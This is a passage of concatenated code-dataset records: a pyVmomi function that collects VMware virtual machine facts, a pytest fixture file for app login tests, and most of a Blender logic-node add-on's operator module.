digits=(18,2))","sub_path":"openerp/addons/hr_payroll_ezra/bank_payroll/security_bank.py","file_name":"security_bank.py","file_ext":"py","file_size_in_byte":12614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300200937","text":"def gather_vm_facts(content, vm):\n ' Gather facts from vim.VirtualMachine object. '\n facts = {\n 'module_hw': True,\n 'hw_name': vm.config.name,\n 'hw_power_status': vm.summary.runtime.powerState,\n 'hw_guest_full_name': vm.summary.guest.guestFullName,\n 'hw_guest_id': vm.summary.guest.guestId,\n 'hw_product_uuid': vm.config.uuid,\n 'hw_processor_count': vm.config.hardware.numCPU,\n 'hw_cores_per_socket': vm.config.hardware.numCoresPerSocket,\n 'hw_memtotal_mb': vm.config.hardware.memoryMB,\n 'hw_interfaces': [],\n 'hw_datastores': [],\n 'hw_files': [],\n 'hw_esxi_host': None,\n 'hw_guest_ha_state': None,\n 'hw_is_template': vm.config.template,\n 'hw_folder': None,\n 'hw_version': vm.config.version,\n 'instance_uuid': vm.config.instanceUuid,\n 'guest_tools_status': _get_vm_prop(vm, ('guest', 'toolsRunningStatus')),\n 'guest_tools_version': _get_vm_prop(vm, ('guest', 'toolsVersion')),\n 'guest_question': vm.summary.runtime.question,\n 'guest_consolidation_needed': vm.summary.runtime.consolidationNeeded,\n 'ipv4': None,\n 'ipv6': None,\n 'annotation': vm.config.annotation,\n 'customvalues': {\n \n },\n 'snapshots': [],\n 'current_snapshot': None,\n 'vnc': {\n \n },\n }\n if vm.summary.runtime.host:\n try:\n host = vm.summary.runtime.host\n facts['hw_esxi_host'] = host.summary.config.name\n except vim.fault.NoPermission:\n pass\n if vm.summary.runtime.dasVmProtection:\n facts['hw_guest_ha_state'] = vm.summary.runtime.dasVmProtection.dasProtected\n datastores = vm.datastore\n for ds in datastores:\n facts['hw_datastores'].append(ds.info.name)\n try:\n files = vm.config.files\n layout = vm.layout\n if files:\n facts['hw_files'] = [files.vmPathName]\n for item in layout.snapshot:\n for snap in item.snapshotFile:\n facts['hw_files'].append((files.snapshotDirectory + snap))\n for item in layout.configFile:\n facts['hw_files'].append(((os.path.dirname(files.vmPathName) + '/') + item))\n for item in vm.layout.logFile:\n 
facts['hw_files'].append((files.logDirectory + item))\n for item in vm.layout.disk:\n for disk in item.diskFile:\n facts['hw_files'].append(disk)\n except Exception:\n pass\n facts['hw_folder'] = PyVmomi.get_vm_path(content, vm)\n cfm = content.customFieldsManager\n for value_obj in vm.summary.customValue:\n kn = value_obj.key\n if ((cfm is not None) and cfm.field):\n for f in cfm.field:\n if (f.key == value_obj.key):\n kn = f.name\n break\n facts['customvalues'][kn] = value_obj.value\n net_dict = {\n \n }\n vmnet = _get_vm_prop(vm, ('guest', 'net'))\n if vmnet:\n for device in vmnet:\n net_dict[device.macAddress] = list(device.ipAddress)\n if vm.guest.ipAddress:\n if (':' in vm.guest.ipAddress):\n facts['ipv6'] = vm.guest.ipAddress\n else:\n facts['ipv4'] = vm.guest.ipAddress\n ethernet_idx = 0\n for entry in vm.config.hardware.device:\n if (not hasattr(entry, 'macAddress')):\n continue\n if entry.macAddress:\n mac_addr = entry.macAddress\n mac_addr_dash = mac_addr.replace(':', '-')\n else:\n mac_addr = mac_addr_dash = None\n if (hasattr(entry, 'backing') and hasattr(entry.backing, 'port') and hasattr(entry.backing.port, 'portKey') and hasattr(entry.backing.port, 'portgroupKey')):\n port_group_key = entry.backing.port.portgroupKey\n port_key = entry.backing.port.portKey\n else:\n port_group_key = None\n port_key = None\n factname = ('hw_eth' + str(ethernet_idx))\n facts[factname] = {\n 'addresstype': entry.addressType,\n 'label': entry.deviceInfo.label,\n 'macaddress': mac_addr,\n 'ipaddresses': net_dict.get(entry.macAddress, None),\n 'macaddress_dash': mac_addr_dash,\n 'summary': entry.deviceInfo.summary,\n 'portgroup_portkey': port_key,\n 'portgroup_key': port_group_key,\n }\n facts['hw_interfaces'].append(('eth' + str(ethernet_idx)))\n ethernet_idx += 1\n snapshot_facts = list_snapshots(vm)\n if ('snapshots' in snapshot_facts):\n facts['snapshots'] = snapshot_facts['snapshots']\n facts['current_snapshot'] = snapshot_facts['current_snapshot']\n facts['vnc'] = get_vnc_extraconfig(vm)\n return facts","sub_path":"Data Set/bug-fixing-5/d37386d2c7f7044860950e3abcec32edff6ef770--bug.py","file_name":"d37386d2c7f7044860950e3abcec32edff6ef770--bug.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"489436200","text":"\"\"\"\n-------------------------------------------------\n File Name: conftest\n Description :\n Author : zws\n date: 2018/3/6\n-------------------------------------------------\n Change Activity:\n 2018/3/6:\n-------------------------------------------------\n\"\"\"\n__author__ = 'zws'\n\nimport pytest\n\nfrom Common.BaseDriver import BaseDriver\nfrom PageObjects.home_page import Home_Page\nfrom PageObjects.login_page import Login_Page\nfrom TestDatas import COMM_DATA as CD\n\n\n@pytest.fixture\ndef init_driver():\n driver = BaseDriver().init_driver()\n yield driver\n\n\n@pytest.fixture\ndef init_add_friend():\n driver = BaseDriver().init_driver()\n home_page = Home_Page(driver)\n login_pag = Login_Page(driver)\n home_page.touch_login()\n login_pag.login_by_password_action(CD.login_username_zws, CD.login_passwd_zws)\n home_page.touch_do_next()\n home_page.touch_home_friend()\n yield driver\n\n@pytest.fixture()\ndef init_register():\n driver = BaseDriver().init_driver()\n home_page = Home_Page(driver)\n home_page.touch_to_sign_up()\n yield 
driver\n\n\n","sub_path":"TestCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56688683","text":"import os, subprocess\nimport json\nimport bpy\nimport bge_netlogic\nimport bge_netlogic.utilities as utils\nfrom bpy_extras.io_utils import ImportHelper\nimport webbrowser\n\n\nNODE_ATTRS = [\n 'value',\n 'game_object',\n 'default_value',\n 'use_toggle',\n 'use_value',\n 'true_label',\n 'false_label',\n 'value_type',\n 'bool_editor',\n 'int_editor',\n 'float_editor',\n 'string_editor',\n 'radians',\n 'filepath_value',\n 'sound_value',\n 'float_field',\n 'expression_field',\n 'input_type',\n 'value_x',\n 'value_y',\n 'value_z',\n 'title',\n 'local',\n 'operator',\n 'formatted',\n 'pulse',\n 'hide',\n 'label',\n 'ref_index',\n 'use_owner',\n 'advanced'\n]\n\n\nclass TreeCodeWriterOperator(bpy.types.Operator):\n bl_idname = \"bgenetlogic.treecodewriter_operator\"\n bl_label = \"Timed code writer\"\n bl_options = {'REGISTER', 'UNDO'}\n timer = None\n\n def modal(self, context, event):\n if event.type == \"TIMER\":\n bge_netlogic._consume_update_tree_code_queue()\n return {'PASS_THROUGH'}\n\n def execute(self, context):\n if context.window is None:\n utils.warn('Working Window not found, hibernating...')\n bge_netlogic._tree_code_writer_started = False\n return {\"FINISHED\"}\n if context.window_manager is None:\n utils.warn('Window Manager not found, hibernating...')\n bge_netlogic._tree_code_writer_started = False\n return {\"FINISHED\"}\n if self.timer is not None:\n utils.warn('No Timer Set. Hibernating...')\n return {'FINISHED'}\n self.timer = context.window_manager.event_timer_add(\n 1.0,\n window=context.window\n )\n context.window_manager.modal_handler_add(self)\n return {\"RUNNING_MODAL\"}\n\n\nclass WaitForKeyOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.waitforkey\"\n bl_label = \"Press a Key\"\n bl_options = {'REGISTER', 'UNDO'}\n keycode: bpy.props.StringProperty()\n\n def __init__(self):\n self.socket = None\n self.node = None\n\n def __del__(self):\n pass\n\n def execute(self, context):\n return {'FINISHED'}\n\n def cleanup(self, context):\n if self.socket.value == \"Press a key...\":\n self.socket.value = \"\"\n self.socket = None\n self.node = None\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n\n def modal(self, context, event):\n if event.value == \"PRESS\":\n if (\n event.type == \"LEFTMOUSE\" or\n event.type == \"MIDDLEMOUSE\" or\n event.type == \"RIGHTMOUSE\"\n ):\n self.socket.value = \"Press & Choose\"\n return {'FINISHED'}\n else:\n value = event.type\n if(self.socket):\n self.socket.value = value\n else:\n self.node.value = value\n self.cleanup(context)\n return {'FINISHED'}\n return {'PASS_THROUGH'}\n\n def invoke(self, context, event):\n self.socket = context.socket\n self.node = context.node\n\n if(not self.socket) and (not self.node):\n utils.error(\"No socket or Node\")\n return {'FINISHED'}\n\n if(self.socket):\n self.socket.value = \"Press a key...\"\n\n else:\n self.node.value = \"Press a key...\"\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n\n\nclass NLImportProjectNodes(bpy.types.Operator):\n bl_idname = \"bge_netlogic.import_nodes\"\n bl_label = \"Import Logic Nodes\"\n bl_options = {'REGISTER', 
'UNDO'}\n filepath: bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'tree_type'):\n return False\n tree_type = context.space_data.tree_type\n return tree_type == bge_netlogic.ui.BGELogicTree.bl_idname\n\n def _create_directories(self):\n local_bge_netlogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bge_netlogic_folder):\n os.mkdir(local_bge_netlogic_folder)\n local_cells_folder = bpy.path.abspath(\"//bgelogic/cells\")\n if not os.path.exists(local_cells_folder):\n os.mkdir(local_cells_folder)\n local_nodes_folder = bpy.path.abspath(\"//bgelogic/nodes\")\n if not os.path.exists(local_nodes_folder):\n os.mkdir(local_nodes_folder)\n return local_cells_folder, local_nodes_folder\n\n def _entry_filename(self, p):\n ws = p.rfind(\"\\\\\")\n us = p.rfind(\"/\")\n if us >= 0 and us > ws:\n return p.split(\"/\")[-1]\n if ws >= 0 and ws > us:\n return p.split(\"\\\\\")[-1]\n return p\n\n def _generate_unique_filename(self, output_dir, file_name):\n dot_index = file_name.rfind(\".\")\n name_part = file_name[:dot_index]\n ext_part = file_name[dot_index + 1:]\n path = os.path.join(output_dir, file_name)\n index = 0\n while os.path.exists(path):\n name = '{}_{}.{}'.format(name_part, index, ext_part)\n path = os.path.join(output_dir, name)\n index += 1\n if index > 100:\n raise RuntimeError(\n \"Can't find a unique name for {}\".format(file_name)\n )\n return path\n\n def _zipextract(self, zip, entry_name, output_dir):\n import shutil\n with zip.open(entry_name) as entry:\n out_file = self._generate_unique_filename(\n output_dir, self._entry_filename(entry_name)\n )\n with open(out_file, \"wb\") as f:\n shutil.copyfileobj(entry, f)\n\n def execute(self, context):\n import zipfile\n if not self.filepath:\n return {\"FINISHED\"}\n\n if not self.filepath.endswith(\".zip\"):\n return {\"FINISHED\"}\n\n if not zipfile.is_zipfile(self.filepath):\n return {\"FINISHED\"}\n\n with zipfile.ZipFile(self.filepath, \"r\") as f:\n entries = f.namelist()\n cells = [\n x for x in entries if x.startswith(\"bgelogic/cells/\") and\n x.endswith(\".py\")\n ]\n nodes = [\n x for x in entries if x.startswith(\"bgelogic/nodes/\") and\n x.endswith(\".py\")\n ]\n if cells or nodes:\n local_cells_folder, local_nodes_folder = (\n self._create_directories()\n )\n for cell in cells:\n self._zipextract(f, cell, local_cells_folder)\n for node in nodes:\n self._zipextract(f, node, local_nodes_folder)\n _do_load_project_nodes(context)\n return {\"FINISHED\"}\n\n def invoke(self, context, event):\n self.filepath = \"\"\n context.window_manager.fileselect_add(self)\n return {\"RUNNING_MODAL\"}\n\n\ndef _do_load_project_nodes(context):\n utils.notify(\"Loading project nodes and cells...\")\n current_file = context.blend_data.filepath\n file_dir = os.path.dirname(current_file)\n netlogic_dir = os.path.join(file_dir, \"bgelogic\")\n # cells_dir = os.path.join(netlogic_dir, \"cells\")\n nodes_dir = os.path.join(netlogic_dir, \"nodes\")\n if os.path.exists(nodes_dir):\n bge_netlogic.remove_project_user_nodes()\n bge_netlogic.load_nodes_from(nodes_dir)\n\n\nclass NLLoadProjectNodes(bpy.types.Operator):\n bl_idname = \"bge_netlogic.load_nodes\"\n bl_label = \"Reload Project Nodes\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Reload the custom nodes' definitions.\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n _do_load_project_nodes(context)\n return {\"FINISHED\"}\n\n\nclass 
NLSelectTreeByNameOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.select_tree_by_name\"\n bl_label = \"Edit\"\n bl_description = \"Edit\"\n tree_name: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n assert self.tree_name is not None\n assert len(self.tree_name) > 0\n blt_groups = [\n g for g in bpy.data.node_groups if (\n g.name == self.tree_name\n ) and (\n g.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname\n )\n ]\n if len(blt_groups) != 1:\n utils.error(\"Something went wrong here...\")\n for t in blt_groups:\n context.space_data.node_tree = t\n return {'FINISHED'}\n\n\nclass NLRemoveTreeByNameOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_tree_by_name\"\n bl_label = \"Remove\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove the tree from the selected objects\"\n tree_name: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n import bge_netlogic.utilities as tools\n stripped_tree_name = tools.strip_tree_name(self.tree_name)\n py_module_name = tools.py_module_name_for_stripped_tree_name(\n stripped_tree_name\n )\n py_module_name = py_module_name.split('NL')[-1]\n objs = [\n ob for ob in context.scene.objects if ob.select_get() and\n tools.object_has_treeitem_for_treename(\n ob, self.tree_name\n )\n ]\n for ob in objs:\n tree_name = utils.make_valid_name(self.tree_name)\n module = f'nl_{tree_name.lower()}'\n gs = ob.game\n idx = 0\n for c in gs.components:\n if c.module == module:\n bpy.ops.logic.python_component_remove(index=idx)\n idx += 1\n controllers = [\n c for c in gs.controllers if py_module_name in c.name\n ]\n actuators = [\n a for a in gs.actuators if py_module_name in a.name\n ]\n sensors = [\n s for s in gs.sensors if py_module_name in s.name\n ]\n for s in sensors:\n bpy.ops.logic.sensor_remove(sensor=s.name, object=ob.name)\n for c in controllers:\n bpy.ops.logic.controller_remove(\n controller=c.name, object=ob.name\n )\n for a in actuators:\n bpy.ops.logic.actuator_remove(actuator=a.name, object=ob.name)\n\n bge_netlogic.utilities.remove_tree_item_from_object(\n ob, self.tree_name\n )\n bge_netlogic.utilities.remove_network_initial_status_key(\n ob, self.tree_name\n )\n utils.success(\"Successfully removed tree {} from object {}.\".format(\n self.tree_name,\n ob.name\n ))\n return {'FINISHED'}\n\n def remove_tree_from_object_pcoll(self, ob, treename):\n index = None\n i = 0\n for item in ob.bgelogic_treelist:\n if item.tree_name == treename:\n index = i\n break\n i += 1\n if index is not None:\n ob.bgelogic_treelist.remove(index)\n\n\nclass NLUpdateTreeVersionOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.update_tree_version\"\n bl_label = \"Update Trees\"\n bl_description = \"Update trees to the current version of the Addon\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n cases = {\n 'NLConditionLogicOperation': self.update_compare_node,\n 'NLActionRayCastNode': self.update_ray_node,\n 'NLActionStart3DSoundAdv': self.update_3dsound_node,\n 'NLActionStartSound': self.update_sound_node,\n 'NLActionGetCharacterInfo': self.update_charinfo_node,\n 'NLConditionCollisionNode': self.update_collision_node,\n 'NLParameterTypeCast': self.update_typecast_node\n }\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n for node in tree.nodes:\n f = cases.get(node.bl_idname, None)\n if f:\n f(tree, 
node)\n        return {'FINISHED'}\n\n    def restore_input(self, tree, node, replacer, idx, new_idx=None):\n        if new_idx is None:\n            new_idx = idx\n        ipt = node.inputs[idx]\n        new_ipt = replacer.inputs[new_idx]\n        for attr in NODE_ATTRS:\n            if attr == 'label':\n                continue\n            if hasattr(ipt, attr):\n                setattr(new_ipt, attr, getattr(ipt, attr))\n        if ipt.is_linked:\n            for link in ipt.links:\n                tree.links.new(link.from_socket, new_ipt)\n\n    def restore_output(self, tree, node, replacer, idx, new_idx=None):\n        if new_idx is None:\n            new_idx = idx\n        opt = node.outputs[idx]\n        new_opt = replacer.outputs[new_idx]\n        if opt.is_linked:\n            for link in opt.links:\n                tree.links.new(new_opt, link.to_socket)\n\n    def restore_inputs(self, tree, node, replacer, start=0, scope=0, offset=0):\n        if scope == 0:\n            scope = len(node.inputs) - 1\n        for idx in range(scope):\n            i = node.inputs[idx+start]\n            for attr in NODE_ATTRS:\n                if attr == 'label':\n                    continue\n                if hasattr(i, attr):\n                    setattr(replacer.inputs[idx+offset], attr, getattr(i, attr))\n            if i.is_linked:\n                for link in i.links:\n                    tree.links.new(\n                        link.from_socket,\n                        replacer.inputs[idx+offset]\n                    )\n\n    def restore_outputs(self, tree, node, replacer, start=0, scope=0, offset=0):\n        if scope == 0:\n            scope = len(node.outputs) - 1\n        for idx in range(scope):\n            o = node.outputs[idx+start]\n            if o.is_linked:\n                for link in o.links:\n                    # relink the replacer output to each old destination socket\n                    tree.links.new(\n                        replacer.outputs[idx+offset],\n                        link.to_socket\n                    )\n\n    def update_typecast_node(self, tree, node):\n        if node.inputs[0].bl_idname == 'NLTypeCastSocket':\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_input(tree, node, replacer, 0, 1)\n            self.restore_input(tree, node, replacer, 1, 0)\n            self.restore_outputs(tree, node, replacer)\n            tree.nodes.remove(node)\n\n    def update_collision_node(self, tree, node):\n        if len(node.inputs) == 2:\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_input(tree, node, replacer, 0)\n            self.restore_input(tree, node, replacer, 1, 2)\n            self.restore_outputs(tree, node, replacer)\n            replacer.update_draw()\n            tree.nodes.remove(node)\n\n    def update_charinfo_node(self, tree, node):\n        if len(node.inputs) > 1:\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_input(tree, node, replacer, 1, 0)\n            self.restore_outputs(tree, node, replacer)\n            tree.nodes.remove(node)\n\n    def update_ray_node(self, tree, node):\n        if len(node.inputs) < 8:\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_inputs(tree, node, replacer, 0, 3)\n            self.restore_inputs(tree, node, replacer, 4, 2)\n            self.restore_input(tree, node, replacer, 6, 7)\n            self.restore_outputs(tree, node, replacer)\n            tree.nodes.remove(node)\n\n    def update_sound_node(self, tree, node):\n        if len(node.outputs) < 3:\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_inputs(tree, node, replacer)\n            self.restore_output(tree, node, replacer, 0)\n            self.restore_output(tree, node, replacer, 1, 2)\n            tree.nodes.remove(node)\n\n    def update_3dsound_node(self, tree, node):\n        if node.inputs[5].bl_idname != 'NLSocketAlphaFloat':\n            replacer = tree.nodes.new(node.bl_idname)\n            replacer.location = node.location\n            replacer.label = node.label\n            self.restore_inputs(tree, node, replacer, scope=4)\n            self.restore_inputs(\n                tree,\n                node,\n                replacer,\n                
scope=6,\n start=7,\n offset=8\n )\n self.restore_output(tree, node, replacer, 0)\n self.restore_output(tree, node, replacer, 1, 2)\n tree.nodes.remove(node)\n elif len(node.outputs) < 3:\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n self.restore_inputs(tree, node, replacer)\n self.restore_output(tree, node, replacer, 0)\n self.restore_output(tree, node, replacer, 1, 2)\n tree.nodes.remove(node)\n\n def update_compare_node(self, tree, node):\n if node.inputs[0].bl_idname != 'NLPositiveFloatSocket':\n return\n replacer = tree.nodes.new(node.bl_idname)\n replacer.location = node.location\n replacer.label = node.label\n replacer.operator = node.operator\n replacer.inputs[0].value_type = node.inputs[1].value_type\n replacer.inputs[0].value = node.inputs[1].value\n replacer.inputs[1].value_type = node.inputs[2].value_type\n replacer.inputs[1].value = node.inputs[2].value\n\n if node.inputs[0].is_linked:\n link = node.inputs[0].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[2]\n )\n if node.inputs[1].is_linked:\n link = node.inputs[1].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[0]\n )\n if node.inputs[2].is_linked:\n link = node.inputs[2].links[0]\n tree.links.new(\n link.from_socket,\n replacer.inputs[1]\n )\n self.restore_outputs(tree, node, replacer)\n tree.nodes.remove(node)\n\n\nclass NLMakeGroupOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.make_group\"\n bl_label = \"Pack Into New Tree\"\n bl_description = \"Convert selected Nodes to a new tree. Will be applied to selected object.\\nWARNING: All Nodes connected to selection must be selected too\"\n bl_options = {'REGISTER', 'UNDO'}\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n return True\n\n def _index_of(self, item, a_iterable):\n i = 0\n for e in a_iterable:\n if e == item:\n return i\n i += 1\n\n def group_make(self, group_name, add_nodes):\n node_tree = bpy.data.node_groups.new(group_name, 'BGELogicTree')\n group_name = node_tree.name\n\n nodes = node_tree.nodes\n new_nodes = {}\n parent_tree = bpy.context.space_data.edit_tree\n locs = []\n\n for node in add_nodes:\n added_node = nodes.new(node.bl_idname)\n added_node.location = node.location\n new_nodes[node] = added_node\n\n for old_node in new_nodes:\n new_node = new_nodes[old_node]\n for attr in dir(old_node):\n if attr in NODE_ATTRS:\n setattr(new_node, attr, getattr(old_node, attr))\n for socket in old_node.outputs:\n for link in socket.links:\n to_node = link.to_node\n if to_node not in add_nodes:\n msg = 'Some linked Nodes are not selected!'\n self.report({\"ERROR\"}, msg)\n utils.error(msg)\n return None\n for socket in old_node.inputs:\n index = self._index_of(socket, old_node.inputs)\n for attr in dir(socket):\n if attr in NODE_ATTRS or attr.startswith('slot_'):\n try:\n if attr != 'label':\n setattr(new_node.inputs[index], attr, getattr(socket, attr))\n except Exception:\n utils.warn('Attribute {} not writable.'.format(attr))\n for link in socket.links:\n try:\n output_socket = link.from_socket\n output_node = new_nodes[output_socket.node]\n outdex = self._index_of(output_socket, output_socket.node.outputs)\n node_tree.links.new(new_node.inputs[index], output_node.outputs[outdex])\n except Exception:\n bpy.data.node_groups.remove(node_tree)\n msg = 'Some linked Nodes are not selected! 
Aborting...'\n self.report({\"ERROR\"}, msg)\n utils.error(msg)\n return None\n locs.append(old_node.location)\n\n for old_node in new_nodes:\n parent_tree.nodes.remove(old_node)\n redir = parent_tree.nodes.new('NLActionExecuteNetwork')\n redir.inputs[0].value = True\n\n try:\n redir.inputs[1].value = bpy.context.object\n except Exception:\n msg = 'No Object was selected; Set Object in tree {} manually!'.format(parent_tree.name)\n self.report({\"WARNING\"}, msg)\n utils.warn(msg)\n redir.inputs[2].value = bpy.data.node_groups[group_name]\n redir.location = self.avg_location(locs)\n node_tree.use_fake_user = True\n utils.success(f'Created Node Tree {group_name}.')\n return node_tree\n\n def avg_location(self, locs):\n avg_x = 0\n avg_y = 0\n for v in locs:\n avg_x += v[0]\n avg_y += v[1]\n avg_x /= len(locs)\n avg_y /= len(locs)\n return (avg_x, avg_y)\n\n def execute(self, context):\n utils.debug('Packing Group...')\n nodes_to_group = []\n tree = context.space_data.edit_tree\n\n if tree is None:\n utils.error('Could not pack group! Aborting...')\n return {'FINISHED'}\n for node in tree.nodes:\n if node.select:\n nodes_to_group.append(node)\n if len(nodes_to_group) > 0:\n name = bpy.context.scene.nl_group_name.name\n if self.group_make(name, nodes_to_group):\n bge_netlogic._update_all_logic_tree_code()\n return {'FINISHED'}\n\n\nclass NLAdd4KeyTemplateOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_4_key_temp\"\n bl_label = \"4 Key Movement\"\n bl_description = \"Add 4 Key Movement (WASD with normalized vector)\"\n bl_options = {'REGISTER', 'UNDO'}\n nl_template_name = '4keymovement'\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n elif tree:\n return True\n return False\n\n def add_node(self, x, y, name, node_type, node_list, links=[], values=[]):\n tree = bpy.context.space_data.edit_tree\n\n node = tree.nodes.new(node_type)\n node.label = name\n node.location = (x, y)\n node_list.append(node)\n # value looks like this: [input_index or attribute, value_type, value]\n for value in values:\n index = value['index']\n val_type = value.get('type', 'value')\n val = value['value']\n if isinstance(index, int):\n setattr(node.inputs[index], val_type, val)\n else:\n setattr(node, index, val)\n return node\n\n def link_node(self, node, links, node_list):\n tree = bpy.context.space_data.edit_tree\n # link looks like this: [from_node, outlink, inlink]\n for link in links:\n from_node = node_list[link[0]]\n outsocket = from_node.outputs[link[1]]\n insocket = node.inputs[link[2]]\n tree.links.new(\n outsocket,\n insocket\n )\n\n def get_template_path(self):\n addon_path = ''.join(bpy.utils.script_paths(subdir='addons', user_pref=False, check_all=False, use_user=False))\n addon_path = os.path.join(addon_path, 'bge_netlogic')\n addon_path = addon_path if os.path.exists(addon_path) else os.path.join(bpy.utils.user_resource('SCRIPTS', path=\"addons\"), 'bge_netlogic')\n return os.path.join(\n addon_path,\n 'templates',\n 'prefabs',\n self.nl_template_name + '.json'\n )\n\n def execute(self, context):\n utils.debug('Adding template...')\n tree = context.space_data.edit_tree\n jf = json.load(open(self.get_template_path()))\n content = jf['nodes']\n\n if tree is None:\n utils.error('Cannot add template! 
Aborting...')\n return {'FINISHED'}\n for node in tree.nodes:\n node.select = False\n\n nodes = []\n for c in content:\n self.add_node(\n c['x'],\n c['y'],\n c['label'],\n c['node_type'],\n nodes,\n values=c['values']\n )\n i = 0\n for c in content:\n self.link_node(nodes[i], c['links'], nodes)\n i += 1\n\n for node in nodes:\n node.select = True\n if node.label == 'Speed':\n continue\n node.hide = True\n for socket in node.inputs:\n if not socket.is_linked:\n socket.hide = True\n for socket in node.outputs:\n if not socket.is_linked:\n socket.hide = True\n\n bpy.ops.transform.translate()\n utils.success('Added 4 Key Template.')\n return {'FINISHED'}\n\n\nclass NLApplyLogicOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.apply_logic\"\n bl_label = \"Apply Logic\"\n bl_description = \"Apply the current tree to the selected objects.\"\n bl_options = {'REGISTER', 'UNDO'}\n owner: bpy.props.StringProperty()\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n scene = context.scene\n for ob in scene.objects:\n if ob.select_get():\n return True\n return False\n\n def execute(self, context):\n current_scene = context.scene\n tree = context.space_data.edit_tree\n tree.use_fake_user = True\n py_module_name = bge_netlogic.utilities.py_module_name_for_tree(tree)\n selected_objects = [\n ob for ob in current_scene.objects if ob.select_get()\n ]\n initial_status = bge_netlogic.utilities.compute_initial_status_of_tree(\n tree.name, selected_objects\n )\n try:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(f\"Couldn't compile tree {tree.name}!\")\n print(e)\n initial_status = True if initial_status is None else False\n for obj in selected_objects:\n utils.success(\n \"Applied tree {} to object {}.\".format(\n tree.name,\n obj.name\n )\n )\n if tree.mode:\n tree_name = utils.make_valid_name(tree.name)\n module = f'nl_{tree_name.lower()}'\n name = f'{module}.{tree_name}'\n comps = [c.module for c in obj.game.components]\n if module not in comps:\n bpy.ops.logic.python_component_register(component_name=name)\n else:\n self._setup_logic_bricks_for_object(\n tree, py_module_name, obj, context\n )\n tree_collection = obj.bgelogic_treelist\n contains = False\n for t in tree_collection:\n if t.tree_name == tree.name:\n contains = True\n break\n if not contains:\n new_entry = tree_collection.add()\n new_entry.tree_name = tree.name\n new_entry.tree = tree\n # this will set both new_entry.tree_initial_status and add a\n # game property that makes the status usable at runtime\n bge_netlogic.utilities.set_network_initial_status_key(\n obj, tree.name, initial_status\n )\n return {'FINISHED'}\n\n def _setup_logic_bricks_for_object(\n self,\n tree,\n py_module_name,\n obj,\n context\n ):\n game_settings = obj.game\n disp_name = py_module_name\n disp_name = disp_name.split('NL')[-1] + '_NL'\n sensor_name = disp_name\n sensor = None\n for s in game_settings.sensors:\n if s.name == sensor_name:\n sensor = s\n break\n if sensor is None:\n bpy.ops.logic.sensor_add(\n type=\"ALWAYS\",\n object=obj.name\n )\n sensor = game_settings.sensors[-1]\n sensor.show_expanded = False\n sensor.pin = True\n sensor.use_pulse_true_level = True\n sensor.name = sensor_name\n # create the controller\n controller_name = disp_name + '_PY'\n controller = None\n for c in 
